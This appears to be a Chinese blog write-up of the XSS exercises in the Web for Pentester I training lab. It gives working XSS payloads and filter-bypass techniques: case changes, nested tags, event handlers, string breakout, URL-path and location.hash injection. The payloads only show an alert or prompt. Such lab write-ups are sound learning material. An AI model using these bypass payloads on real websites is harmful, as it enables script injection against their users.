web_for_pentester_I_XSS

example1:<script>alert(1)</script> 直接弹窗

example2:<Script>alert(1)</scriPt> 大小写绕过弹窗

example3:<Sc<script>ript>alert(1)</sc</script>riPt>双写绕过

example4:<iframe οnlοad=alert(/xss/)> 绕过对script标签的过滤,<img src=x οnerrοr=alert(/xss/)>也行,当然还有很多。不过在这题里用的其实可以直接过前三个。。。。

example5:<script>prompt(1)</script> 绕过对alert()的过滤

example6:</script><script>prompt(1)</script><script>

做题过程:首先输入<script>prompt(1)</script>测试,观察源码如下:

<script>
	var $a= "hacker<script>prompt(1)</script>";
</script>

这就简单了,把外面的两个script标签提前闭合就好了。

example7:';alert(1) ;//'

照例先输入<script>alert(1)</script>测试,发现尖括号被转义了:

<script>
	var $a= 'hacker&lt;script&gt;alert(1)&lt;/script&gt;';
</script>

开始想法闭合,/xss/example7.php?name=hacker';alert(1) var $b='

<script>
	var $a= 'hacker';alert(1) var $b='';
</script>

还是不行,又构造成name=hacker';alert(1) ;//'  成了!

<script>
	var $a= 'hacker';alert(1) ;//'';
</script>
	

example8:按照常规思路,我们是在输入框里插入xss.我输入<a>可以发现尖括号被转义

这题就要转换思路——从URL入手,注入点在<form action=" "这部分。

payload:/example8.php/"><script>alert(1)</script>

example9: 观察源码:

这句话的意思是向网页文档中输出URL#后面(location.hash)第二个字符开始(substring(1))的内容.所以构造payload为

/example9.php#h<script>alert(1)</script> 然后没有弹窗。。。。。。。

  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值